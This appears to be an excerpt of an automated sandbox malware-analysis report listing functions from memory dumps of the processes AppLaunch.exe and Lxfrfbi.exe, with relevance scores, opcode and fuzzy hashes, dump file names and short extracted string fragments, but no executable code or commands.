Instruction ID: 0d635b4b96272917704740cd9bc7aba0add8caa4694025bc45690fb82ef4797d
Opcode Fuzzy Hash: 97bdf5ee2f4762f97f5e00c611f4803d705c806892e6229ab2efb5ba227c193e
Instruction Fuzzy Hash: E141CF74A01115DFCB54EF68D984AAEFBB2FF44301F1184A8E916AB3A2D730EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06770AA0 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceca1d9018caecd88f80f4c7bc30317b49c7bb0094398116bb91e0cb0ece4456
Instruction ID: fc262976537d2a986de9d0d2e7d649988b06ab8380af49a572db546c9eebd8dc
Opcode Fuzzy Hash: ceca1d9018caecd88f80f4c7bc30317b49c7bb0094398116bb91e0cb0ece4456
Instruction Fuzzy Hash: 7E51AF702012059FCB15EF28F986D597F62FF893057508669D402CBB69EB39E94ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 067711D0 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dba3e2c2491ee37736f5fa818d93d88f1a4842febc8453effd371adb484f061
Instruction ID: dd16872337355377d30ba8e749685f1eb9e84cb688b4d2f7fa2f5883c15782a7
Opcode Fuzzy Hash: 6dba3e2c2491ee37736f5fa818d93d88f1a4842febc8453effd371adb484f061
Instruction Fuzzy Hash: 1341B270F00209AFCB44EFB9984466EBFFAEF89310F1485A9D449D7345DA349E428BA1

Uniqueness

Uniqueness Score: -1.00%

Function 06774206 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43eb3710d310c76695236f9ae54afef81454f52ae746f0176cd0b42829ce2bf4
Instruction ID: 1ded91cb2f309899abce22901a266fb9c1558534ac3786e324043d708f851e54
Opcode Fuzzy Hash: 43eb3710d310c76695236f9ae54afef81454f52ae746f0176cd0b42829ce2bf4
Instruction Fuzzy Hash: D341DFB0D00249DFDB10DFA9C884ADEBFF5BF48314F108429E819AB254DB75A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06774210 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 506987c2012b2359f9840d00b3b11686fceb3e3dc0ad6083d84375d3671b691c
Instruction ID: c76e1bc58d253e023384aea37f2e28744baf2e1b34e47da5bb0e27213708a908
Opcode Fuzzy Hash: 506987c2012b2359f9840d00b3b11686fceb3e3dc0ad6083d84375d3671b691c
Instruction Fuzzy Hash: 1B41CEB1D00249DFDB10DFA9C984ADEBFF5BF48314F108429E819AB254DB75A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06778FF2 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 710eedbc3f69e3512222f81af30785aa7b4024c6aabe9c39f4397b73395db682
Instruction ID: b3328843979721ccdc17f726074a323fd86f476788ffc61444b66a1cc199838a
Opcode Fuzzy Hash: 710eedbc3f69e3512222f81af30785aa7b4024c6aabe9c39f4397b73395db682
Instruction Fuzzy Hash: 4F216030A11215CFCB59EB78D958AAD7BB2FF89204F144438D512AB364DF359942CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06770998 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fd68d626835cade762cbe1bf12f4465f896ed2a21ac450d06489834fb66f348
Instruction ID: 39fd39390191b42acb2a85bc363be4f21ea87cc20ec86411247b276eb9aa4ec6
Opcode Fuzzy Hash: 6fd68d626835cade762cbe1bf12f4465f896ed2a21ac450d06489834fb66f348
Instruction Fuzzy Hash: 5B2183B0B14342DFEFF4AB75AD48A3E3FA4AF55301F06946DD807C2250EA348505CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00D1D4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2915742409.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d1d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da73a6e02f4210181fa62b37f2987a3606915b645df988680e438a02b36a4b14
Instruction ID: 038d781868611423075ef952a07c2618138f14a9ca6fb8a699737702464177d1
Opcode Fuzzy Hash: da73a6e02f4210181fa62b37f2987a3606915b645df988680e438a02b36a4b14
Instruction Fuzzy Hash: 91210371504200EFEB05DF14E9C0B67BF67FB98318F24C569E9090A256C736D896CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 067709A8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8309290643f07a61f418bd336f64d4e730e1166582322999e03003bf89f84095
Instruction ID: 3616ed3900a04194f17e24fcfcae609f9a30ef0af7e5ba2487e3411a99f1054c
Opcode Fuzzy Hash: 8309290643f07a61f418bd336f64d4e730e1166582322999e03003bf89f84095
Instruction Fuzzy Hash: 3D2151B0B103039FEFF4AFB5A958A3E7FA4AF54245F0144299807C5250EE348542CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0677A2CA Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9dde762038ba0d6f03fb3785b94189b7d3387e411798f965c2439a45a27acb
Instruction ID: ebada2034f4b36ee7563d0d4ce364d4786eea5bdcfa9d26cfe8c6f4fec01d8a8
Opcode Fuzzy Hash: 1e9dde762038ba0d6f03fb3785b94189b7d3387e411798f965c2439a45a27acb
Instruction Fuzzy Hash: BD112330B002004FCB59AB38E8415AE7BE7EFC87147008179C806C3354EE75DD068BE5

Uniqueness

Uniqueness Score: -1.00%

Function 06779E00 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ce0d5e9b9939aa72a3148540ace9f374b12cccc1387b1dcf530c0485bc4cd37
Instruction ID: 71895f0690a251ba3d899aebabc357f6532949227355e25644b5eed4d50c2ec0
Opcode Fuzzy Hash: 2ce0d5e9b9939aa72a3148540ace9f374b12cccc1387b1dcf530c0485bc4cd37
Instruction Fuzzy Hash: 6111B470A042448FCF81EB38E805AAEBFB1EF85314F10877DC1159B391EB759A1A8BD5

Uniqueness

Uniqueness Score: -1.00%

Function 06771431 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d065db424b7e1f036a52ae6aeba5daf2acaa4e75563d8f62f762cbc7e35d4528
Instruction ID: 82d5e6f6358b6f2c218c724901d302acfd501eac099b080668c9cb289351cca8
Opcode Fuzzy Hash: d065db424b7e1f036a52ae6aeba5daf2acaa4e75563d8f62f762cbc7e35d4528
Instruction Fuzzy Hash: 1511E171B01241DFCF91EBB8D404A6A7FF2AF8A20475408B9C805CB761EA34CC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00D1D49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2915742409.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d1d000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 98176eb2a22a4e5f950f82f640c5e1c60a07404a207e4c32d111cacbb8573e42
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: C311D376504240DFDB16CF14D5C4B56BF72FB94324F28C6A9D9090B256C336D85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 06771440 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 621fd6a85b2f357ce7554ec409fab9b66a544a6b4ab3f90a912abd3c685e56cb
Instruction ID: 9d99616396226cf8b6af9553881cfe6a795ce137b8be3d90739f4b4b412d1d17
Opcode Fuzzy Hash: 621fd6a85b2f357ce7554ec409fab9b66a544a6b4ab3f90a912abd3c685e56cb
Instruction Fuzzy Hash: 8911C070B00205DFCF94EBB9D504A6E7BF6BF8820571444B9D00ACB360EA35CC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06779E10 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57474d6b5240a93fa4ece9692796c0d3a266d4799acaa7912f28a4a2c46da6aa
Instruction ID: e329c26307ec79b73d3d7f377e7b2225bcc7f74f4d4f659801bf7618434a95cb
Opcode Fuzzy Hash: 57474d6b5240a93fa4ece9692796c0d3a266d4799acaa7912f28a4a2c46da6aa
Instruction Fuzzy Hash: D31198706002059FCF81FB38D80555EBFF1EF85314F108679C2159B395DB759A468BD5

Uniqueness

Uniqueness Score: -1.00%

Function 06778D60 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9574ec4fd166001240c23c7332a3541772cf540cd057c8fc153eb709be247320
Instruction ID: 7be95d9bb55abd90212f41ba7b97048bc5e9c6824b126142b38bdad8a4810a95
Opcode Fuzzy Hash: 9574ec4fd166001240c23c7332a3541772cf540cd057c8fc153eb709be247320
Instruction Fuzzy Hash: 5D1100B5D00348CFCB60DF9AD588BEEBBF4AB48324F20846AD459A7250C334A544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06778D68 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14a899025c4f069ade70afb47309ea7bf268d716d111044d66f274bff9d199b4
Instruction ID: 0b628bc4e00904a638f8783a620ade7dfe01b54d10f1330b9c2d9a49ac4624f3
Opcode Fuzzy Hash: 14a899025c4f069ade70afb47309ea7bf268d716d111044d66f274bff9d199b4
Instruction Fuzzy Hash: B41120B5900348CFCB20DF9AD588BDEBBF4EB08324F20846AD459A7350C338A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0677887F Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82b918a8c9a566fdb9ec119d74d1fbfa580801efd514b59aba76c5048580dddb
Instruction ID: acc15501849e6c0883118a558c8378399d00249b605168af42a3b5a05661343d
Opcode Fuzzy Hash: 82b918a8c9a566fdb9ec119d74d1fbfa580801efd514b59aba76c5048580dddb
Instruction Fuzzy Hash: 6AF0A0313583A04FC7469AF8A8584E93FE59F8B20031904EAE141CF3B6C9248D0787A1

Uniqueness

Uniqueness Score: -1.00%

Function 067725F1 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eae2fceaa5cd989ee1779845c0bb4958008b9f05f4c529314a47a606c68b9393
Instruction ID: fafe47c6e89696efa83ee0e24bd412e2e03cce02d365903333d897f3d0a3b1a8
Opcode Fuzzy Hash: eae2fceaa5cd989ee1779845c0bb4958008b9f05f4c529314a47a606c68b9393
Instruction Fuzzy Hash: 01D09E35159384DFC746DBA9E494C517FB86F8760030640DAE440CF673C655AC14D766

Uniqueness

Uniqueness Score: -1.00%

Function 06770A73 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe17489fb491c197681229668da4403cec1c4ee1d9b8beed526cf0e816f42974
Instruction ID: 9069c4e2677cf51bfde497e1ac5e308ea1c0e9f52f09f4da0878ffba2e9c6edc
Opcode Fuzzy Hash: fe17489fb491c197681229668da4403cec1c4ee1d9b8beed526cf0e816f42974
Instruction Fuzzy Hash: 00C08CA052474ACFEFB067A0ED0CA3C3F10ABA0302F024016A003842E5CEB4084287BF

Uniqueness

Uniqueness Score: -1.00%

Function 06770A8F Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac0d0bca3a2adde6f9c6199a11e42feef65e7b18331f6ca6e4ea5d841417dc20
Instruction ID: 0c6503b6dadea8f28929ac6908132e902d6c59a77098358fb0f7c3a4d1806a67
Opcode Fuzzy Hash: ac0d0bca3a2adde6f9c6199a11e42feef65e7b18331f6ca6e4ea5d841417dc20
Instruction Fuzzy Hash: ADC08CA0524307CFEBB027A0ED0CA3C3E10AFA0302F024012A003842E5CEB4080243BF

Uniqueness

Uniqueness Score: -1.00%

Function 06772600 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2919839850.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6770000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85116792f8c614669b4183bf3067f8fed697c48a1ad11479315682bcedcc82b6
Instruction ID: 2ae0f33a8440bdb5ba01e1712a9e866763a52c3d55faa021e9f3e499e33a05d4
Opcode Fuzzy Hash: 85116792f8c614669b4183bf3067f8fed697c48a1ad11479315682bcedcc82b6
Instruction Fuzzy Hash: B7C048352602088FC244EA99E589C12BBA8BF98A003410099E5018BB22CB21F810DA61

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Lxfrfbi.exePID: 7936, Parent PID: 2580COMMON

Executed Functions

Function 081CED68 Relevance: 16.2, Strings: 12, Instructions: 1184COMMON

Download Yara Rule

Strings

$^q, xrefs: 081CF692
$^q, xrefs: 081CF649
$^q, xrefs: 081CF25F
$^q, xrefs: 081CF6A2
4, xrefs: 081CF73D
,bq, xrefs: 081CF822
$^q, xrefs: 081CF1BF
$^q, xrefs: 081CF639
$^q, xrefs: 081CF26F
$^q, xrefs: 081CEFEB
$^q, xrefs: 081CEFFB
$^q, xrefs: 081CF1AF

Memory Dump Source

Source File: 0000000C.00000002.2258368483.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_81b0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: 5f33eea64d70161f3292754c249331d618e0a56908ab181e2f05de8a609200fb
Instruction ID: 8bc26b0aa7a7299f7fde48efc7635e316a1a661236dc8e385a7345b4ac0f1315
Opcode Fuzzy Hash: 5f33eea64d70161f3292754c249331d618e0a56908ab181e2f05de8a609200fb
Instruction Fuzzy Hash: 70B21834A00218DFDB14CFA8D994BADB7B2BF58701F1584A9E505AB3A5CB71DC86CF60

Uniqueness

Uniqueness Score: -1.00%

Function 072C8C80 Relevance: 7.2, Strings: 5, Instructions: 983COMMON

Download Yara Rule

Strings

pbq, xrefs: 072C983A
4'^q, xrefs: 072C9753
TJcq, xrefs: 072C8E22
xbaq, xrefs: 072C8DAD
Te^q, xrefs: 072C93A3

Memory Dump Source

Source File: 0000000C.00000002.2219710588.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_72c0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: 4'^q$TJcq$Te^q$pbq$xbaq
API String ID: 0-2576840827
Opcode ID: 4b5fad1b8f4019ff692b0d8d664889992dc1f2f0c677bda1474cef8c27775b74
Instruction ID: d66c6e42b6bc89fe8a4309b086915328f038ea74538af3007651cde38ed86c99
Opcode Fuzzy Hash: 4b5fad1b8f4019ff692b0d8d664889992dc1f2f0c677bda1474cef8c27775b74
Instruction Fuzzy Hash: EEA2C875A10228CFDB54CF69C984AD9BBB2FF89304F1581E9D549AB325DB31AE81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 072C8C2C Relevance: 4.0, Strings: 3, Instructions: 279COMMON

Download Yara Rule

Strings

TJcq, xrefs: 072C8E22
xbaq, xrefs: 072C8DAD
Te^q, xrefs: 072C93A3

Memory Dump Source

Source File: 0000000C.00000002.2219710588.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_72c0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$xbaq
API String ID: 0-3225726259
Opcode ID: 5b6e012cb256cb3d30259625606d33151dcd8aa1483428f686e4a20cf7adaaf9
Instruction ID: 9b2483861e0e97408c079ad6ee9689f8ecb6014d762b074efec709c8046688bb
Opcode Fuzzy Hash: 5b6e012cb256cb3d30259625606d33151dcd8aa1483428f686e4a20cf7adaaf9
Instruction Fuzzy Hash: A5C178B5E016198FDB58DF6AC9446DDBBF2BF89300F14C1AAD809AB365DB305A81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 072C9FD0 Relevance: 3.6, Strings: 2, Instructions: 1081COMMON

Download Yara Rule

Strings

2, xrefs: 072CAB10
$^q, xrefs: 072CA4D0

Memory Dump Source

Source File: 0000000C.00000002.2219710588.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_72c0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: 2$$^q
API String ID: 0-1071376767
Opcode ID: cbee1421696d82551c9aba04838ac886b3c18667fdcba6e8c7bc9353c88b1221
Instruction ID: bbba72ad1b72f637d2427b45ea9b878678fe9d129c6c97a53e28d54852a01a30
Opcode Fuzzy Hash: cbee1421696d82551c9aba04838ac886b3c18667fdcba6e8c7bc9353c88b1221
Instruction Fuzzy Hash: 96C2C1B4E412298FCB64DF68C984B9DBBB6FB89300F1085E9D509AB355DB309E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 014F14C8 Relevance: 3.1, Strings: 2, Instructions: 593COMMON

Download Yara Rule

Strings

\s^q, xrefs: 014F17B2
LR^q, xrefs: 014F159E

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 390f111d48c2f94e3c372e5862673700dd3a5b89a14a22abc760031328097f15
Instruction ID: fbe260882b03f99bc762ded0218db57604005dac4a2f65a54ac421762aa8c426
Opcode Fuzzy Hash: 390f111d48c2f94e3c372e5862673700dd3a5b89a14a22abc760031328097f15
Instruction Fuzzy Hash: 34326E74E00219CFDB14CF79D894AAEBBF2BF88700F56856AE409EB364D7309941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014F14B9 Relevance: 2.9, Strings: 2, Instructions: 389COMMON

Download Yara Rule

Strings

\s^q, xrefs: 014F17B2
LR^q, xrefs: 014F159E

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 009a7966d6a0c96360d2f1b2512725cb24330ab18485f638d213d0a63f8ad6e9
Instruction ID: d87b1fadb0f258859033f0f9d37ed97bbf52a90116adf0c92baeea1200b1c24e
Opcode Fuzzy Hash: 009a7966d6a0c96360d2f1b2512725cb24330ab18485f638d213d0a63f8ad6e9
Instruction Fuzzy Hash: EDE16275E002298FDB14CF79D8446AEB7F2BFC8704F158569E40AEB364DB349946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014F1579 Relevance: 2.8, Strings: 2, Instructions: 341COMMON

Download Yara Rule

Strings

\s^q, xrefs: 014F17B2
LR^q, xrefs: 014F159E

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 4f993a50730c550fd5da7d0d5cae3b59753e2507d5299b4f80456b38247b718a
Instruction ID: a1e33967df65305ef96ed687a818b3ce5c7fe0bd70f59861f583210cd80698b1
Opcode Fuzzy Hash: 4f993a50730c550fd5da7d0d5cae3b59753e2507d5299b4f80456b38247b718a
Instruction Fuzzy Hash: 23D17375E001298FDB14CF79D884AAEB7F2BFC8705F168629D409EB364DB349942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014F205C Relevance: 1.5, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

LR^q, xrefs: 014F21DF

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 24ef744a729190b78585c4ec626445d0865c0c79704bc84094d7eb078cdf4a5a
Instruction ID: 58bd2a3c524ed0dd11c459d12b7cfc38d8766f8f72a2e55aff416c2e4d4f6195
Opcode Fuzzy Hash: 24ef744a729190b78585c4ec626445d0865c0c79704bc84094d7eb078cdf4a5a
Instruction Fuzzy Hash: 57B1D174E002198FCB15DB79D890AAEBBB2FF89304F1481AED515EB365DB709D46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 081CD480 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Deq, xrefs: 081CD585

Memory Dump Source

Source File: 0000000C.00000002.2258368483.00000000081B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_81b0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: 57ccba7bd9ff7c75fde37881a9f10f0261da0a6f0dc9d58ac3769c17bb113c39
Instruction ID: f960b009c3c5af5b15c48ac88acc8797ef007d5e5a7ba3101a58a657359dc0a9
Opcode Fuzzy Hash: 57ccba7bd9ff7c75fde37881a9f10f0261da0a6f0dc9d58ac3769c17bb113c39
Instruction Fuzzy Hash: 4BD1D374E00218CFDB54DFA9D994A9DBBB2FF88304F1080A9E409AB365DB35AD85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 014F11E8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

\s^q, xrefs: 014F1361

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: 3ba32d5124147f32e33f58d6ecb80f4d5228dcac7667ee00e3e2ecd6ebd9ac01
Instruction ID: a8d682f02292880aff835735a5abfa8095738055d7618ded90573e355de79cc8
Opcode Fuzzy Hash: 3ba32d5124147f32e33f58d6ecb80f4d5228dcac7667ee00e3e2ecd6ebd9ac01
Instruction Fuzzy Hash: 5C81F8B8E4010EDFEF14CFA9D5849AEBBB1FB88310F10A659D406EB364DB359941CB10

Uniqueness

Uniqueness Score: -1.00%

Function 014F207B Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

LR^q, xrefs: 014F21DF

Memory Dump Source

Source File: 0000000C.00000002.1927765469.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_14f0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: a3ced4d2ea77099feb5c5709b9cea71095e66aa4f3c0e4d05d2cb0711d6dfeae
Instruction ID: a4f41565e6fc1a6be2d540ac2fb4206e79ee6976227f74e3eab311ec2565f37e
Opcode Fuzzy Hash: a3ced4d2ea77099feb5c5709b9cea71095e66aa4f3c0e4d05d2cb0711d6dfeae
Instruction Fuzzy Hash: A081D374E041298FDB15CB79C890AAEBBF2FF85300F58C19AD1559B366D7709D42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 072CB3BC Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2219710588.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_72c0000_Lxfrfbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb9c4f272c81e6f72a966a55c9fa6516316d444253a63aaf725a9b099c315a9
Instruction ID: 0e046ee6ed66e7228331fc3bd48889115a53a95170a2ad255e1241531bb6568b
Opcode Fuzzy Hash: ebb9c4f272c81e6f72a966a55c9fa6516316d444253a63aaf725a9b099c315a9
Instruction Fuzzy Hash: 2C32D3B4A50229CFCB65DF28C984A99B7B6FF49300F1082E9D90DA7355DB30AE85CF44

Uniqueness

